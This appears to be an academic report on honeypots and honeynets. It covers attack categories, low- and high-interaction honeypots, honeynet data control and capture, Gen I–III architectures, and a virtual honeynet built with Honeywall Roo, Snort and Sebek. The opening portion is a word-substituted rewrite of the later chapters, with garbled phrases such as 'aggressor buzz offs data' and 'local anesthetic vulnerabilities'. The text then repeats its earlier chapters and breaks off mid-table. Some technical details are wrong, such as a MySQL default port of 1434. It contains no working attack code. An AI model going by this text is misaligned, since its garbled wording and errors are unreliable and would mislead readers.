(prenominal) as by performing thoroughgoing user password combinations as in brute-force attacks. Or by exploiting contrary local anesthetic vulnerabilities in services and applications that are termed as holes. Other types of attacks includeMasquerading attack when aggressor pretends to be a different entity. Attacker user dissimulator Identity of some legitimate user.Replay attack In Replay attack, aggressor buzz offs data and retransmits it to produce an unauthorized effect. It is a kind of man in middle attack.Modification attack In this type of attack integrity of the message is compromise. Message or file is modified by the attacker to achieve his malicious goals.Denial of service (DOS)attack In DOS attack an attacker attempts to retain legitimate users from accessing information or services. By targeting your computer and its network connection, or the computers and network of the sites you are trying to use, an attacker may be able to disallow you from accessing ema il, websites, online accounts (banking, etc.), or other services that rely on the affected computer.transmission control protocol ICMP scanning is also a form of active attacks in which the attackers exploit the way protocols are designed to respond. e.g. ping of death, sync attacks etc.In all types of active attacks the attacker creates note over the network and transmits packets making it possible to detect and trace the attacker. Depending on the skill level, it has been observed that the skill full attackers commonly attack their victims from proxy destinations that they have victimized earlier.1.5.2 Passive AttacksPassive attacks involve the attacker existence able to intercept, collect monitor any transmission sent by their victims. Thus, eavesdropping on their victim and in the process being able to mind in to their victims or targets communications. Passive attacks are very specialized types of attacks which are aimed at obtaining information that is being transmitted over secure and insecure channels. Since the attacker does not create any noise or minimal noise on the network so it is very difficult to detect and identify them.Passive attacks can be divided into 2 main types, the release of message subject field and traffic analysis.Release of message content It involves protecting message content from getting in hands of unauthorized users during transmission. This can be as basic as a message delivered via a telephone conversation, instant messenger chat, email or a file.Traffic analysis It involves techniques used by attackers to determine the actual message from encrypted intercepted messages of their victims. Encryption provides a room to mask the table of contents of a message using mathematical formulas and thus make them unreadable. The headmaster message can only be retrieved by a reverse process called decryption. This cryptographic system is often base on a linchpin or a password as input from the user. With traffic analysis t he attacker can passively observe patterns, trends, frequencies and lengths of messages to guess the key or retrieve the original message by various cryptanalysis systems.Chapter 2 Honeypot and Honeynet 2.1 HoneypotIs a system, or part of a system, deliberately made to see an intruder or system cracker. Honeypots have additional functionality and onset detection systems build into them for the accumulation of valuable information on the intruders.The era of practical(prenominal)ization had its impact on security and honeypots, the community responded, marked by the fine efforts of Niels Provos (founder of honeyd) Thorsten Holz for their masterpiece record book Virtual Honeypots From Botnet Tracking to Intrusion Detection in 2007.2.2 Types of HoneypotsHoneypots can be categorized into 2 main types ground on level of interaction Deployment.2.2.1 Level of interactionLevel of interaction determines the amount of functionality a honeypot provides.2.2.1.1 Low-interaction HoneypotL ow-interaction honey pots are limited in the extent of their interaction with the attacker. They are generally emulator of the services and operating systems.2.2.1.2 High interaction HoneypotHigh-interaction honeypots are complex solution they involve with the deployment of received operating systems and applications. High interaction honeypots overtake extensive amount of information by allowing attacker to interact with the real systems.2.2.2 DeploymentBased on deployment honeypot may be classified as toil HoneypotsResearch Honeypots2.2.2.1 Production HoneypotsProduction honeypots are honeypots that are placed within the production networks for the inclination of detection. They extend the capabilities of the intrusion detection systems. These type of honeypots are unquestionable and cond to integrate with the organizations infrastructure and scope. They are usually implemented as low-interaction honeypots but implementation may spay depending on the available funding and exp ertise involve by the organization.Production honeypots can be placed within the application and authentication server subnets and can identify any attacks directed towards those subnets. Thus they can be used to identify both internal and external threats for an organization. These types of honeypots can also be used to detect malware propagation in the network caused by zero day exploits. Since IDSs detection is based on database signatures they fail to detect exploits that are not outlined in their databases. This is where the honeypots out shine the Intrusion detection systems. They aid the system network administrators by providing network situational awareness. On substructure of these results administrators can take decisions necessary to add or enhance security resources of the organization e.g. firewall, IDS and IPS etc.2.2.2.1 Research HoneypotsResearch honeypots are deployed by network security researchers the whitehat hackers. Their primarily goal is to withdraw the tools, tactics techniques of the blackhat hackers by which they exploit computers network systems. These honeypots are deployed with the idea of allowing the attacker complete freedom and in the process learn his tactics from his movement within the system. Research honeypots help security researchers to isolate attacker tools they use to exploit systems. They are then carefully studied within a sand box environment to identify zero day exploits. Worms, Trojans and viruses propagating in the network can also be isolated and studied. The researchers then document their findings and share with system programmers, network and system administrators various system and anti-virus vendors. They provide the blunt material for the rule engines of IDS, IPS and firewall system.Research Honeypots act as early warning systems. They are designed to detect and log maximum information from attackers yet being stealthy enough not to let attackers identify them. The identity of the honeypot is c rucial and we can conclude that the learning curve (from the attacker) is directly proportional to the stealthiest of thehoneypot .These types of honeypots are usually deployed at universities and by the RD departments of various organizations. These types of honeypots are usually deployed as High-Interaction honeypots.2.3 HoneynetThe concept of the honeypot is sometimes extended to a network of honeypots, known as a honeynet. In honeynet we grouped different types of honeypots with different operatrating systems which increases the probability of confine an attacker. At the same time, a background knowledge in which the attacker explores the honeynet through network connections between the various host systems provides additional prospects for monitoring the attack and uncover information about the intruder. The honeynet operator can also use the honeynet for training purposes, gaining valuable experience with attack strategies and digital forensics without endangering productio n systems.The Honeynet project is a non-profit research organization that provides tools for building and managing honeynets. The tools of the Honeynet project are designed for the latest generation of high interaction honeynets that require two separate networks. The honeypots reside on the front network, and the second network holds the tools for managing the honeynet. Between these tools (and facing the Internet) is a device known as the honeywall. The honeywall, which is actually a kind of opening device, captures controls, and analyzes all inbound and outward traffic to the honeypots4.It is a high-interaction honeypot designed to capture wide- position of information on threats. High-interaction means that a honeynet provides real systems, applications, and services for attackers to interact with, as opposed to low-interaction honeypots which provide emulated services and operating systems. It is through this extensive interaction we gain information on threats, both externa l and internal to an organization. What makes a honeynet different from most honeypots is that it is a network of real computers for attackers to interact with. These victim systems (honeypots within the honeynet) can be any type of system, service, or information you want to provide 14.2.4 Honeynet Data careData management consist of three process Data control, data capture and data solicitation.2.4.1 Data ControlData control is the containment of activity within the honeynet. It determines the means through which the attackers activity can be restricted in a way to forefend damaging/abusing other systems/resources through the honeynet. This demands a great deal of planning as we require to give the attacker freedom in order to learn from his moves and at the same time not let our resources (honeypot+bandwidth) to be used to attack, damage and abuse other hosts on the same or different subnets. Careful measures are taken by the administrators of the honeynet to study and medita te a policy on attackers freedom versus containment and implement this in a way to achieve maximum data control and yet not be discovered or identified by the attacker as a honeypot. Security is a process and is implemented in layers, various mechanisms to achieve data control are available such(prenominal) as firewall, counting outbound connections, intrusion detection systems,intrusion prevention systems and bandwidth restriction etc. Depending on our requirements and risk thresholds defined we can implement data control mechanisms checkly 4.2.4.2 Data CaptureData Capture involves the capturing, monitoring and record of allthreats and attacker activities within the honeynet. Analysis of this captured data provides an insight on the tools, tactics, techniques and motives of the attackers. The concept is to achieve maximum logging capability at all nodes and hence log any kind of attackers interaction without the attacker knowing it. This type of stealthy logging is achieved by s etting up tools and mechanisms on the honeypots to log all system activity and have network logging capability at the honeywall. Every bit of information is crucial in study the attacker whether its a TCP port scan, remote and local exploit attempt, brute force attack, attack tool download by the haacker, various local commands convey, any type of communication carried out over encrypted and unencrypted channels (mostly IRC) and any outbound connection attempt made by the attacker 25. All of this should be logged successfully and sent over to a remote location to avoid any loss of data due to risk of system damage caused by attackers, such as data wipe out on dish antenna etc. In order to avoid detection of this kind of activity from the attacker, data masking techniques such as encryption should be used.2.4.3 Data CollectionOnce data is captured, it is securely sent to a centralized data collection point. Data is used for analysis and archiving which is collected from different honeynet sensors. Implementations may vary depending on the requirements of the organization, however latest implementations incorporate data collection at the honeywall gateway 19.2.5 Honeynet ArchitecturesThere are three honeynet architectures namely Generation I, Generation II and Generation III2.5.1 Generation I ArchitectureGen I Honeynet was developed in 1999 by the Honeynet Project. Its purpose was to capture attackers activity and give them the feeling of a real network. The architecture is simple with a firewall aided by IDS at bet and honeypots placed behind it. This makes it detectable by attacker 7.2.5.2 Generation II III ArchitectureGen II honeynets were first introduced in 2001 and Gen III honeynets was released in the end of 2004. Gen II honeynets were made in order to address the issues of Gen I honeynets. Gen II and Gen III honeynets have the same architecture. The only difference being improvements in deployment and management, in Gen III honeynets along with the addition of Sebek server built in the honeywall. Sebek is a stealthy capture tool installed on honeypots that capture and log all requests sent to the system read and write system call. This is very helpful in providing an insight on the attacker 7.A radical change in architecture was brought about by the introduction of a single device that handles the data control and data capture mechanisms of the honeynet called the IDS Gateway or marketing-wise, the Honeywall. By making the architecture to a greater extent stealthy, attackers are kept longer and thus more data is captured. There was also a major thrust in up honeypot layer of data capture with the introduction of a in the buff UNIX and Windows based data.2.6 Virtual HoneynetVirtualization is a technology that allows cultivatening binary realistic machines on a single physical machine. Each virtual machine can be an independent operational system installation. This is achieved by sharing the physical machines resources such as central processing unit, Memory, transshipment center and peripherals through specialized software across multiple environments. Thus multiple virtual Operating systems can run concurrently on a single physical machine 4.A virtual machine is specialized software that can run its own operating systems and applications as if it were a physical computer. It has its own CPU, RAM storage and peripherals managed by software that dynamically shares it with the physical hardware resources.VirtulizationA virtual Honeynet is a solution that facilitates one to run a honeynet on a single computer. We use the term virtual because all the different operating systems placed in the honeynet have the appearance to be running on their own, independent computer. Network to a machine on the Honeynet may indicate a compromised enterprise system.CHAPTER 3Design and Implementation computing device networks, connected to the Internet are vulnerable to a variety of exploits that can compromise their in tended operations. Systems can be subject to Denial of Service Attacks, i-e preventing other computers to gain access for the desired service (e.g. web server) or prevent them from connecting to other computers on the Internet. They can also be subject to attacks that cause them to furlough operations either temporarily or permanently. A hacker may be able to compromise a system and gain root access as if he is the system administrator. The number of exploits targeted against various syllabuss, operating systems, and applications increasing regularly. Most of vulnerabilities and attack methods are detected after the exploitations and cause big loses. quest are the main components of physical deployment of honeynet. First is the design of the Deployed Architecture. Then we installed sunlight Virtual box as the Virtualization software. In this we virtually installed three Operating System two of them will work as honey pots and one Honeywall Roo 1.4 as Honeynet transparent Gateway. Snort and sebek are the part of honeywall roo operating system. Snort as IDS and Snort-Inline as IPS. Sebek as the Data Capture tool on the honeypot.The entire OS and honeywall functionality is installed on the system it formats all the previous data from the hard disk. The only purpose now of the CDROM is to install this functionality to the local hard drive. LiveCD could not be modified, so after installing it on the hard drive we can modify it according to our requirement. This approach help us to maintain the honeywall, allowing honeynet to use automated tools such asyumto keep packages current 31.In the following table there is a summry of products with features installed in honeynet and hardware requirements. Current versions of the installed products are also mention in the table.Table 3.1 Project SummaryProject SummaryFeatureProductSpecificationsHost Operating SystemWindows Server 2003 R2HW Vendor HP Compaq DC 7700 central processorIntel(R) Pentium D CPU 3GHzRAM 2GBStorage 120GBNIC 1GB Ethernet controller (public IP )Guest Operating System 1Linux, Honeywall Roo 1.4 champion Processor Virtual Machine( HONEYWALL )RAM 512 MBStorage 10 GBNIC 1 100Mbps Bridged portholeNIC 2 100Mbps host-only interfaceNIC 3 100Mbps Bridged interface(public IP )Guest Operating System 2Linux, Ubuntu 8.04 LTS (Hardy Heron)Single Processor Virtual Machine( HONEYPOT )RAM 256 MBStorage 10 GBNIC 100Mbps host-only vmnet (public IP )Guest Operating System 3Windows Server 2003Single Processor Virtual Machine( HONEYPOT )RAM 256 MBStorage 10 GBNIC 100Mbps host-only vmnet (public IP )Virtualization softwareSUN Virtual Box mutant 3ArchitectureGen IIIGen III implemented as a virtual honeynetHoneywallRooRoo 1.4IDSSnortSnort 2.6.xIPSSnort_inlineSnort_inline 2.6.1.5Data Capture Tool (on honeypots)SebekSebek 3.2.0Honeynet Project Online incumbencyNovember 12, 2009 TO December 12, 20093.1 Deployed Architecture and Design3.2 Windows Server 2003 as Host OSUsability and procedure of virtualiza tion softwares are very good on windows server 2003. Windows Server 2003is aserveroperating system produced byMicrosoft. it is considered by Microsoft to be the cornerstone of itsWindows Server Systemline of business server products. Windows Server 2003 is more scalable and delivers better performance than its predecessor,Windows 2000.3.3 Ubuntu as HoneypotDetermined to use free and open source software for this project, Linux was the natural choice to fill as the Host Operating System for our projects server. Ubuntu 8.04 was used as a linux based honeypot for our implementation. The concept was to setup an up-to-date Ubuntu server, cond with commonly used services such as SSH, FTP, Apache, MySQL and PHP and study attacks directed towards them on the internet. Ubuntu being the most wide used Linux desktop can prove to be a good platform to study zero day exploits. It also becomes a candidate for malware collection and a source to learn hacker tools being used on the internet. Ubuntu was successfully deployed as a virtual machine and setup in our honeynet with a host-only virtual Ethernet connection. The honeypot was made sweeter i.e. an interesting target for the attacker by setting up all services with default settings, for example SSH allowed password based connectivity from any IP on default port 22, users created were given privileges to install and run applications, Apache index.html page was made remotely accessible with default errors and banners, MySQL default port 1434 was accessible and outbound connections were allowed but limited 3.Ubuntu is a computeroperating systembased on theDebianGNU/Linux distribution. It is named after theSouthern Africanethical political theory Ubuntu (humanity towards others)5and is distributed asfree and open source software. Ubuntu provides an up-to-date, stable operating system for the average user, with a strong focus onusabilityand ease of installation. Ubuntu focuses onusability andsecurity. The Ubiquity installer a llows Ubuntu to be installed to the hard disk from within the Live CD environment, without the need for restarting the computer prior to installation. Ubuntu also emphasizesaccessibilityandinternationalization to chance on as many people as possible 33.Ubuntu comes installed with a wide range of software that includes OpenOffice, Firefox,Empathy (Pidgin in versions before 9.10), Transmission, GIMP, and several lightweight games (such as Sudoku and chess). Ubuntu allows networking ports to be closed using its firewall, with customized port selectioAnalysis of Honeynets and Honeypots for SecurityAnalysis of Honeynets and Honeypots for SecurityChapter 1 IntroductionHoneynet is a kind of a network security tool, most of the network security tools we have are passive in nature for example Firewalls and IDS. They have the dynamic database of available rules and signatures and they operate on these rules. That is why anomaly detection is limited only to the set of available rules. Any act ivity that is not in alignment with the given rules and signatures goes under the radar undetected. Honeypots by design allows you to take the initiative, and trap those bad guys (hackers). This system has no production value, with no authorized activity. Any interaction with the honeypot is considered malicious in intent. The combination of honeypots is honeynet. Basically honeypots or honeynets do not solve the security problem but provide information and knowledge that help the system administrator to enhance the overall security of his network and systems. This knowledge can act as an Intrusion detection system and used as input for any early warning systems. Over the years researchers have successfully isolated and identified verity of worms exploits using honeypots and honeynets.Honeynets extend the concept of a single honeypot to a highly controlled network of honeypots. A honeynet is a specialized network architecture cond in a way to achieve Data Control, Data Capture Data Collection. This architecture builds a controlled network that one can control and monitor all kind of system and network activity.1.1 Information SecurityInformation Security is the protection of all sensitive information, electronic or otherwise, which is owned by an individual or an organization. It deals with the preservation of the confidentiality, integrity and availability of information. It protects information of organizations from all kinds of threats to ensure business continuity, minimize business damage and maximize the return on investment and business opportunities. Information stored is highly confidential and not for public viewing. Through information security we protect its availability, privacy and integrity.Information is one of most important assets of financial institutions. Fortification of information assets is essential to ascertain and maintain trust between the financial institution and its customers, maintain compliance with the law, and protect the rep utation of the institution. Timely and reliable information is compulsory to process transactions and support financial institution and customer decisions. A financial institutions earnings and capital can be adversely affected, if information becomes known to unauthorized parties is distorted or is not available when it is needed 15.1.2 Network SecurityIt is the protection of networks and its services from any unauthorized access. It includes the confidentiality and integrity of all data passing through the network. It also includes the security of all Network devices and all information assets connected to a network as well as protection against all kind of known and unknown attacks.The ITU-T Security Architecture for Open System Interconnection (OSI) document X.800 and RFC 2828 are the standard documentation defining security services. X.800 divides the security services into 5 categories and 14 specific services which can be summarized asTable 1.1 OSI X.800 Summary81. AUTHENTICA TIONThe assurance that the communicating entity is the one that it claims to be.Peer Entity AuthenticationUsed in association with a logical connection to provide confidence in the identity of the entities connected.Data Origin AuthenticationIn a connectionless transfer, provides assurance that the source of received data is as claimed.2. ACCESS CONTROLThe prevention of unauthorized use of a resource (i.e., this service controls who can have access to a resource, under what conditions access can occur, and what those accessing the resource are allowed to do).3. DATA CONFIDENTIALITYThe protection of data from unauthorized disclosure.Connection ConfidentialityThe protection of all user data on a connection.Connectionless ConfidentialityThe protection of all user data in a single data blockSelective-Field ConfidentialityThe confidentiality of selected fields within the user data on a connection or in a single data block.Traffic Flow ConfidentialityThe protection of the information that might be derived from observation of traffic flows.4. DATA INTEGRITYThe assurance that data received are exactly as sent by an authorized entity (i.e., contain no modification, insertion, deletion, or replay).Connection Integrity with RecoveryProvides for the integrity of all user data on a connection and detects any modification, insertion, deletion, or replay of any data within an entire data sequence, with recovery attempted.Connection Integrity without RecoveryAs above, but provides only detection without recovery.Selective-Field Connection IntegrityProvides for the integrity of selected fields within the user data of a data block transferred over a connection and takes the form of determination of whether the selected fields have been modified, inserted, deleted, or replayed.Connectionless IntegrityProvides for the integrity of a single connectionless data block and may take the form of detection of data modification. Additionally, a limited form of replay detection may be pro vided.Selective-Field Connectionless IntegrityProvides for the integrity of selected fields within a single connectionless data block takes the form of determination of whether the selected fields have been modified.5. NONREPUDIATIONProvides protection against denial by one of the entities involved in a communication of having participated in all or part of the communication.Nonrepudiation, OriginProof that the message was sent by the specified party.Nonrepudiation, DestinationProof that the message was received by the specified party. 1 8, 9,1.3 The Security ProblemSystem security personnel fighting an unending battle to secure their digital assets against the ever increasing attacks, verity of attacks and their intensity is increasing day by day. Most of the attacks are detected after the exploitations so there should be awareness of the threats and vulnerabilities that exist in the Internet today.First we have to understand that we cannot say that there exists a perfect secure ma chine or network because the closest we can get to an absolute secure machine is that we unplugged the network cable and power supply and put that machine in to a safe. Unfortunately it is not useful in that state. We cannot achieve perfect security and perfect access at the same time. We can only increase the no of doors but we cannot put wall instead of doors. In field of security we need to find the vulnerably and exploits before they affect us. Honeypot and honeynet provides a valuable tool to collect information about the behavior of attackers in order to design and implement better defense.In the field of security it is important to note that we cannot simply state that what is the best type of firewall? Absolute security and absolute access are the two chief points. Absolute security and absolute access are inverse to each other. If we increase the security access will be decrease. There should be balance between absolute security and absolute defense, access is given without compromising the security.If we compare it to our daily lives we observe not much difference. We are continuously making decisions regarding what risks we are ready to take. When we step out of our homes we are taking a risk. As we get into a car and drive to our work place there is a risk associated with it too. There is a possibility that something might happen on the highway which will make us a part of an accident. When we fly and sit on an airplane we are willing to undergo the level of risk which is at par with the heavy amount we are paying for this convenience. It is observed that many people think differently about what an acceptable risk would be and in majority cases they do go beyond this thinking. For instance if I am sitting upstairs in my room and have to go to work, I wont take a jump straight out of the window. It might be a faster way but the danger of doing so and the injury I would have to face is much greater than the convenience. It is vital for every organiza tion to decide that between the two opposite poles of total security and total access where they need to place themselves. It is necessary for a policy to articulate this system and then further explain the way it will be enforced with which practices and ways. Everything that is done under the name of security must strictly agree to the policy.1.4 Types of HackerHackers are generally divide into two major categories.1.4.1 Black HatsBlack hat hackers are the biggest threat both internal and external to the IT infrastructure of any organization, as they are consistently challenging the security of applications and services. They are also called crackers, These are the persons who specialize in unauthorized infiltration. There could be Varity of reasons for this type of penetration it could be for profit, for enjoyment, or for political motivations or as a part of a social cause. Such infiltration often involves modification / destruction of data.1.4.2 White HatsWhite hat hackers are similar to black hat hackers but there is a important difference that is white hat hackers do it without any criminal intention. Different companies all around the world hire/contact these kinds of persons to test their systems and softwares. They check how secure these systems are and point out any fault they found.These hackers, also known as ethical hackers, These are the persons or security experts who are specialize in penetration testing. These types of people are also known as tiger teams. These experts may use different types of methods and techniques to carry out their tests, including social engineering tactics, use of hacking tools, and attempts to bypass security to gain entry into protected areas, but they do this only to find weaknesses in the system8.1.5 Types of AttacksThere are many types of attacks that can be categorized under 2 major categoriesActive AttacksPassive Attacks1.5.1 Active AttacksActive attacks involve the attacker taking the offensive and directing m alicious packets towards its victims in order to gain illegitimate access of the target machine such as by performing exhaustive user password combinations as in brute-force attacks. Or by exploiting remote local vulnerabilities in services and applications that are termed as holes. Other types of attacks includeMasquerading attack when attacker pretends to be a different entity. Attacker user fake Identity of some legitimate user.Replay attack In Replay attack, attacker captures data and retransmits it to produce an unauthorized effect. It is a kind of man in middle attack.Modification attack In this type of attack integrity of the message is compromise. Message or file is modified by the attacker to achieve his malicious goals.Denial of service (DOS)attack In DOS attack an attacker attempts to prevent legitimate users from accessing information or services. By targeting your computer and its network connection, or the computers and network of the sites you are trying to use, an a ttacker may be able to prevent you from accessing email, websites, online accounts (banking, etc.), or other services that rely on the affected computer.TCP ICMP scanning is also a form of active attacks in which the attackers exploit the way protocols are designed to respond. e.g. ping of death, sync attacks etc.In all types of active attacks the attacker creates noise over the network and transmits packets making it possible to detect and trace the attacker. Depending on the skill level, it has been observed that the skill full attackers usually attack their victims from proxy destinations that they have victimized earlier.1.5.2 Passive AttacksPassive attacks involve the attacker being able to intercept, collect monitor any transmission sent by their victims. Thus, eavesdropping on their victim and in the process being able to listen in to their victims or targets communications. Passive attacks are very specialized types of attacks which are aimed at obtaining information that is being transmitted over secure and insecure channels. Since the attacker does not create any noise or minimal noise on the network so it is very difficult to detect and identify them.Passive attacks can be divided into 2 main types, the release of message content and traffic analysis.Release of message content It involves protecting message content from getting in hands of unauthorized users during transmission. This can be as basic as a message delivered via a telephone conversation, instant messenger chat, email or a file.Traffic analysis It involves techniques used by attackers to retrieve the actual message from encrypted intercepted messages of their victims. Encryption provides a means to mask the contents of a message using mathematical formulas and thus make them unreadable. The original message can only be retrieved by a reverse process called decryption. This cryptographic system is often based on a key or a password as input from the user. With traffic analysis the atta cker can passively observe patterns, trends, frequencies and lengths of messages to guess the key or retrieve the original message by various cryptanalysis systems.Chapter 2 Honeypot and Honeynet 2.1 HoneypotIs a system, or part of a system, deliberately made to invite an intruder or system cracker. Honeypots have additional functionality and intrusion detection systems built into them for the collection of valuable information on the intruders.The era of virtualization had its impact on security and honeypots, the community responded, marked by the fine efforts of Niels Provos (founder of honeyd) Thorsten Holz for their masterpiece book Virtual Honeypots From Botnet Tracking to Intrusion Detection in 2007.2.2 Types of HoneypotsHoneypots can be categorized into 2 main types based on Level of interaction Deployment.2.2.1 Level of interactionLevel of interaction determines the amount of functionality a honeypot provides.2.2.1.1 Low-interaction HoneypotLow-interaction honey pots are l imited in the extent of their interaction with the attacker. They are generally emulator of the services and operating systems.2.2.1.2 High interaction HoneypotHigh-interaction honeypots are complex solution they involve with the deployment of real operating systems and applications. High interaction honeypots capture extensive amount of information by allowing attacker to interact with the real systems.2.2.2 DeploymentBased on deployment honeypot may be classified asProduction HoneypotsResearch Honeypots2.2.2.1 Production HoneypotsProduction honeypots are honeypots that are placed within the production networks for the purpose of detection. They extend the capabilities of the intrusion detection systems. These type of honeypots are developed and cond to integrate with the organizations infrastructure and scope. They are usually implemented as low-interaction honeypots but implementation may vary depending on the available funding and expertise required by the organization.Productio n honeypots can be placed within the application and authentication server subnets and can identify any attacks directed towards those subnets. Thus they can be used to identify both internal and external threats for an organization. These types of honeypots can also be used to detect malware propagation in the network caused by zero day exploits. Since IDSs detection is based on database signatures they fail to detect exploits that are not defined in their databases. This is where the honeypots out shine the Intrusion detection systems. They aid the system network administrators by providing network situational awareness. On basis of these results administrators can take decisions necessary to add or enhance security resources of the organization e.g. firewall, IDS and IPS etc.2.2.2.1 Research HoneypotsResearch honeypots are deployed by network security researchers the whitehat hackers. Their primarily goal is to learn the tools, tactics techniques of the blackhat hackers by whi ch they exploit computers network systems. These honeypots are deployed with the idea of allowing the attacker complete freedom and in the process learn his tactics from his movement within the system. Research honeypots help security researchers to isolate attacker tools they use to exploit systems. They are then carefully studied within a sand box environment to identify zero day exploits. Worms, Trojans and viruses propagating in the network can also be isolated and studied. The researchers then document their findings and share with system programmers, network and system administrators various system and anti-virus vendors. They provide the raw material for the rule engines of IDS, IPS and firewall system.Research Honeypots act as early warning systems. They are designed to detect and log maximum information from attackers yet being stealthy enough not to let attackers identify them. The identity of the honeypot is crucial and we can conclude that the learning curve (from the attacker) is directly proportional to the stealthiest of thehoneypot .These types of honeypots are usually deployed at universities and by the RD departments of various organizations. These types of honeypots are usually deployed as High-Interaction honeypots.2.3 HoneynetThe concept of the honeypot is sometimes extended to a network of honeypots, known as a honeynet. In honeynet we grouped different types of honeypots with different operatrating systems which increases the probability of trapping an attacker. At the same time, a setting in which the attacker explores the honeynet through network connections between the various host systems provides additional prospects for monitoring the attack and revealing information about the intruder. The honeynet operator can also use the honeynet for training purposes, gaining valuable experience with attack strategies and digital forensics without endangering production systems.The Honeynet project is a non-profit research organization that provides tools for building and managing honeynets. The tools of the Honeynet project are designed for the latest generation of high interaction honeynets that require two separate networks. The honeypots reside on the first network, and the second network holds the tools for managing the honeynet. Between these tools (and facing the Internet) is a device known as the honeywall. The honeywall, which is actually a kind of gateway device, captures controls, and analyzes all inbound and outbound traffic to the honeypots4.It is a high-interaction honeypot designed to capture wide-range of information on threats. High-interaction means that a honeynet provides real systems, applications, and services for attackers to interact with, as opposed to low-interaction honeypots which provide emulated services and operating systems. It is through this extensive interaction we gain information on threats, both external and internal to an organization. What makes a honeynet different from most hon eypots is that it is a network of real computers for attackers to interact with. These victim systems (honeypots within the honeynet) can be any type of system, service, or information you want to provide 14.2.4 Honeynet Data ManagementData management consist of three process Data control, data capture and data collection.2.4.1 Data ControlData control is the containment of activity within the honeynet. It determines the means through which the attackers activity can be restricted in a way to avoid damaging/abusing other systems/resources through the honeynet. This demands a great deal of planning as we require to give the attacker freedom in order to learn from his moves and at the same time not let our resources (honeypot+bandwidth) to be used to attack, damage and abuse other hosts on the same or different subnets. Careful measures are taken by the administrators of the honeynet to study and formulate a policy on attackers freedom versus containment and implement this in a way to achieve maximum data control and yet not be discovered or identified by the attacker as a honeypot. Security is a process and is implemented in layers, various mechanisms to achieve data control are available such as firewall, counting outbound connections, intrusion detection systems,intrusion prevention systems and bandwidth restriction etc. Depending on our requirements and risk thresholds defined we can implement data control mechanisms accordingly 4.2.4.2 Data CaptureData Capture involves the capturing, monitoring and logging of allthreats and attacker activities within the honeynet. Analysis of this captured data provides an insight on the tools, tactics, techniques and motives of the attackers. The concept is to achieve maximum logging capability at all nodes and hence log any kind of attackers interaction without the attacker knowing it. This type of stealthy logging is achieved by setting up tools and mechanisms on the honeypots to log all system activity and have network logging capability at the honeywall. Every bit of information is crucial in studying the attacker whether its a TCP port scan, remote and local exploit attempt, brute force attack, attack tool download by the haacker, various local commands run, any type of communication carried out over encrypted and unencrypted channels (mostly IRC) and any outbound connection attempt made by the attacker 25. All of this should be logged successfully and sent over to a remote location to avoid any loss of data due to risk of system damage caused by attackers, such as data wipe out on disk etc. In order to avoid detection of this kind of activity from the attacker, data masking techniques such as encryption should be used.2.4.3 Data CollectionOnce data is captured, it is securely sent to a centralized data collection point. Data is used for analysis and archiving which is collected from different honeynet sensors. Implementations may vary depending on the requirements of the organization, however l atest implementations incorporate data collection at the honeywall gateway 19.2.5 Honeynet ArchitecturesThere are three honeynet architectures namely Generation I, Generation II and Generation III2.5.1 Generation I ArchitectureGen I Honeynet was developed in 1999 by the Honeynet Project. Its purpose was to capture attackers activity and give them the feeling of a real network. The architecture is simple with a firewall aided by IDS at front and honeypots placed behind it. This makes it detectable by attacker 7.2.5.2 Generation II III ArchitectureGen II honeynets were first introduced in 2001 and Gen III honeynets was released in the end of 2004. Gen II honeynets were made in order to address the issues of Gen I honeynets. Gen II and Gen III honeynets have the same architecture. The only difference being improvements in deployment and management, in Gen III honeynets along with the addition of Sebek server built in the honeywall. Sebek is a stealthy capture tool installed on honeypo ts that capture and log all requests sent to the system read and write system call. This is very helpful in providing an insight on the attacker 7.A radical change in architecture was brought about by the introduction of a single device that handles the data control and data capture mechanisms of the honeynet called the IDS Gateway or marketing-wise, the Honeywall. By making the architecture more stealthy, attackers are kept longer and thus more data is captured. There was also a major thrust in improving honeypot layer of data capture with the introduction of a new UNIX and Windows based data.2.6 Virtual HoneynetVirtualization is a technology that allows running multiple virtual machines on a single physical machine. Each virtual machine can be an independent Operating system installation. This is achieved by sharing the physical machines resources such as CPU, Memory, Storage and peripherals through specialized software across multiple environments. Thus multiple virtual Operating systems can run concurrently on a single physical machine 4.A virtual machine is specialized software that can run its own operating systems and applications as if it were a physical computer. It has its own CPU, RAM storage and peripherals managed by software that dynamically shares it with the physical hardware resources.VirtulizationA virtual Honeynet is a solution that facilitates one to run a honeynet on a single computer. We use the term virtual because all the different operating systems placed in the honeynet have the appearance to be running on their own, independent computer. Network to a machine on the Honeynet may indicate a compromised enterprise system.CHAPTER 3Design and ImplementationComputer networks, connected to the Internet are vulnerable to a variety of exploits that can compromise their intended operations. Systems can be subject to Denial of Service Attacks, i-e preventing other computers to gain access for the desired service (e.g. web server) or prevent the m from connecting to other computers on the Internet. They can also be subject to attacks that cause them to cease operations either temporarily or permanently. A hacker may be able to compromise a system and gain root access as if he is the system administrator. The number of exploits targeted against various platforms, operating systems, and applications increasing regularly. Most of vulnerabilities and attack methods are detected after the exploitations and cause big loses.Following are the main components of physical deployment of honeynet. First is the design of the Deployed Architecture. Then we installed SUN Virtual box as the Virtualization software. In this we virtually installed three Operating System two of them will work as honey pots and one Honeywall Roo 1.4 as Honeynet transparent Gateway. Snort and sebek are the part of honeywall roo operating system. Snort as IDS and Snort-Inline as IPS. Sebek as the Data Capture tool on the honeypot.The entire OS and honeywall func tionality is installed on the system it formats all the previous data from the hard disk. The only purpose now of the CDROM is to install this functionality to the local hard drive. LiveCD could not be modified, so after installing it on the hard drive we can modify it according to our requirement. This approach help us to maintain the honeywall, allowing honeynet to use automated tools such asyumto keep packages current 31.In the following table there is a summry of products with features installed in honeynet and hardware requirements. Current versions of the installed products are also mention in the table.Table 3.1 Project SummaryProject SummaryFeatureProductSpecificationsHost Operating SystemWindows Server 2003 R2HW Vendor HP Compaq DC 7700ProcessorIntel(R) Pentium D CPU 3GHzRAM 2GBStorage 120GBNIC 1GB Ethernet controller (public IP )Guest Operating System 1Linux, Honeywall Roo 1.4Single Processor Virtual Machine( HONEYWALL )RAM 512 MBStorage 10 GBNIC 1 100Mbps Bridged interfac eNIC 2 100Mbps host-only interfaceNIC 3 100Mbps Bridged interface(public IP )Guest Operating System 2Linux, Ubuntu 8.04 LTS (Hardy Heron)Single Processor Virtual Machine( HONEYPOT )RAM 256 MBStorage 10 GBNIC 100Mbps host-only vmnet (public IP )Guest Operating System 3Windows Server 2003Single Processor Virtual Machine( HONEYPOT )RAM 256 MBStorage 10 GBNIC 100Mbps host-only vmnet (public IP )Virtualization softwareSUN Virtual BoxVersion 3ArchitectureGen IIIGen III implemented as a virtual honeynetHoneywallRooRoo 1.4IDSSnortSnort 2.6.xIPSSnort_inlineSnort_inline 2.6.1.5Data Capture Tool (on 